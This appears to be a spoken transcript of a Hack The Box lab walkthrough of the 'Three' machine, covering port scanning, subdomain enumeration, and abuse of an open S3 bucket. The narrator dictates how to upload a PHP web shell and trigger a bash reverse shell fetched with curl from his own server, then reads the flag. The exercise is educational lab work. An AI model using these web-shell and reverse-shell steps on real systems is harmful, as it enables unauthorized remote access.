Hello, guys. Welcome back to our 10th episode of our Hack the Box series. Today, we'll be looking at a machine called 3, and I have already started the connection with the machine. We have OpenVPN into the machine. The first task, which is how many TCP ports are open. So let's nmap the target. Let's do a fast scan. And let's also do ASV for a more detailed output. And let's wait for the results. Um, so I think there are two TCP ports open. One is a website, which is an HTTP service that's running there, and an SSH service. All right. Open Secure Shell is what SSH is. So I think it's two. All right. What is the domain of the email address provided in the contact section of the website? All right. So let us open up Firefox and paste in the IP. And this is what we get, the band. It's, I think, for a band, they're selling their tickets, etc. So let's go to the contacts, and it is thetoppers.hackthebox. Let's copy that, paste it in. All right. In the absence of a DNS server, which Linux file can we use to resolve hostnames or IP address in order to be able to access the websites that point to those hostnames? Well, from our previous um, machine, which was responders or responder, we know that that file is /etc/hosts. All right. Which subdomain is discovered during further enumeration? Okay, let's see how we do that. Use an enumeration tool like fuzz, wfuzz, or ffuf, etc. All right. Let's first figure out how do we use wfuzz. All right. Um, how does fuzzing work? Well, to find application vulnerabilities. All right. Fuzzing. I'm assuming wfuzz is already installed. Um, XT follow. Okay. Let's try the word list used for enumeration. All right. Um, First of all, okay, it is installed already. Okay. Um, output colors, address. Um, I think we just use dash follow HTTP redirection. Okay. I think let's just try, or okay, let's copy the URL and then just do wfuzz dash dash follow the link. You must specify a payload. Compile. All right. So I think we do have to use the word lists, and let us check our notes for where the word lists. I do remember us using the word list. It is in art. Well, actually, it was for our. We had used the word list when we did the GoBuster. So directory list to font small. So we can just use the same thing. So it is in file system, in home, in Kali seglists discovery or fuzzing. Okay, databases, user agents, 3D, 60 big list, environment, extensions, um, JSON fuzzing, PHP, SSL injection. Hmm. Databases, user agents. All right. Let's try these then. So let's us get the path and then do w fuzz word list paste and slash 100.txt and then follow and then we paste that the URL. Um, is not compiled, might not work correctly. When fuzzing SSL sites, check double fuzz's information. All right, guys. So we have gotten the command, which is using GoBuster, that we try to enumerate the subdomains and not using wfuzz. So we use GoBuster and we use vhost in order to brute force the enumeration part, and we specify the word list by using dash w, and we also use append domain so that the words get appended to the URL, and we specify the URL using dash u. When we do that, we find the enumerated subdomain, which is s3 dot the toppers dot hack the box. So we come back and we paste it, and oh, okay. I think we have logged out of our account. All right, let's paste it again. And there it is. Now, which service is running on the discovered subdomain? So I think we can do this again, which was to sort of nmap the IP address um dash f dash sv, and then I think we had found it was Apache S3. Oh, okay. All right, or it's version 3, I think, maybe. All right, let's just wait for, yep. Oh, okay. There is Apache. Okay, which service is running on the discovered subdomain? State S3 subdomain status. All right. Um, wait, um, yep. So S3 services are provided by Amazon. So, and these are, I mean, AWS services, which is web services provided by Amazon, and it is for object storage, which the S3 stands for Simple Storage Service, which is used to store objects in the cloud provided by Amazon. Now, which command line utility can be used to interact with the service on the discovered subdomain? All right, let's check. Subdomain S3 inter. Uh, um, terminal. Um, all right, use Amazon S3 with the AWS CLI, which I think is the tool using AWS CLI interface. All right, let's try that out. AWS CLI. Yep. Now, which command is used to set up the AWS CLI installation? All right, so first of all, let us check if we have AWS CLI, which we do not. So let us install AWS CLI using a apt install AWS CLI. So let's just use sudo. All right, yes. and it should install the AWS command line interface. All right. So which command is used to set up the AWS CLI installation? Set up AWS CLI. Um, all right. AWS configure, I think. Using AWS. Yep. Yeah. I think it's AWS configure. So let's check AWS CLI, or let's just do AWS configure. Let's just give random values, temp, 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 which should work because sometimes the server is not set up to authenticate whoever is trying to connect. So should be AWS configure. Yep. Now, what is the command used by the above utility to list all of the S3 buckets? So I think that should be all right. Refer to the official AWS CLI documentation. Yep. All right. Setting up, configure, um, using the AWS CLI. Um, maybe command control, return codes, command structure. So I think it should be um 1 second. All right, we can even use AWS help to get help on okay, AWS endpoint URL. So I think we must use endpoint in order to specify the endpoint URL. All right. And the bundle available services, backup, CE, CLI dev, cold store connect should probably be LF. So let's go all the way. All right. Let's just exit. All right. So I think this should be AWS S3 LS to list all of the S3 buckets. Now, this server is configured to run files written in what web scripting language? Well, I would guess PHP. All right, because it's using the Apache. So now, we must First, ls the AWS service. So let's specify the endpoint, which is equal to HTTP S3 dot well, actually before this, let's first add um our, so I think it's, yeah, 10.129.48.173 and S3 dot the toppers dot HackTheBox, um and then sudo t-pend 2/etc/hosts. All right, now we can actually visit the website and we find that it is running. Now, what we do is we AWS by specifying the endpoint HTTP S3 dot with the toppers dot hack the box and S3 ls. All right, we find that there is a bucket called the toppers.hackbox. All right. Now what we do is we ls the S3, we ls the bucket basically. So the toppers dot hack the box, and then we find that there is a directory called images, and there is an index.php file as well. So now what we have to do is we can upload a PHP shell file to the S3 bucket in order to get a command line interface for the PHP server. So for doing that, for getting the PHP shell file to the S3 bucket, what we do is we create a shell.php file by typing this command, which is PHP code basically, PHP system and dollar dot get cmd. All right, and then we name it as shell.php. All right, so if we do ls, we'll find shell.php. All right, now we do AWS endpoint is equal to HTTP S3 dot the toppers dot hackbox S3. We copy the file from our localhost, which is shell.php, into S3 the toppers dot hackbox. All right, and it has successfully uploaded. We can also visit S3 dot the toppers dot hackbox slash shell.php. All right. I think we can also provide command or shell.php. All right, so I think it's question mark command ID. Um, all right, let's try to so this is the URL that we can access. Now let's find our own um IP address, which is 10 dot. All right, so our T10 IP address is 10.10.14.18. Now we can create a reverse shell, and in order to execute commands on the service. So in order to do that, we have to create the shell file. So let's do sudo nano shell.sh. All right, so hash dollar slash bin slash bash. It's a bash script. Bash dash I ampersand slash dev slash TCP slash the IP address, which was 10.10. So X, yes, it was 10.10.14.18. All right. So 10.10.14.18 slash we do it on port 1337 ampersand 1. All right. Control X, save. All right. Now we start an NCAT listener on port 1337 NVLP. All right. So it is listening. Next, what we do is let's start a Python or not a Python, a web server um, on port 8000 HTTP dot server. All right. Now, what we do is we visit the coppers.hackthebox slash shell.php. Command is equal to, we use curl in order to run the 10.10.14.18 on port 3000 slash shell dot sh bash. That did not seem to do anything. Okay. Command string. But I don't think there should be space here. All right. Let me just check what's wrong and I'll be back. All right, guys. So what had happened was that remember we had um, the sudo nano um, the shell.php. Well, in that we must do dollar underscore get instead of dot get, which is what I had done. So once you do that, you can come to shell.php question command is equal to ID, and you get the ID, which ID is an OS command. So you get that details. And then what we do is use curl by providing 20 and then the IP address of Q10, our host, local host IP address, port 8000. We also have the um, HTTP server running locally, and then it basically creates a reverse shell, and we get this command line where we are put into var www/html, and we get images index.php shell.php, which we had uploaded, and then we can come a directory back and we find that the flag.txt is right there. So what we can do is cat flag.txt, and there we go. This is our flag, which we can copy, and which we should be able to submit. I am not sure why we cannot do that. Um, yeah, there you go. And that is 3 pawn. And apparently, those are all the free machines in this tier. That is, and I had also checked the walkthrough file of this machine because it was quite difficult, and we can go through the walkthrough because that's how we learn. And I think from the next machines onwards, in order for us to learn together, I will be, or we will be going through the walkthrough file and solving the machine accordingly. So thank you guys for watching. I'll see you guys in the next one.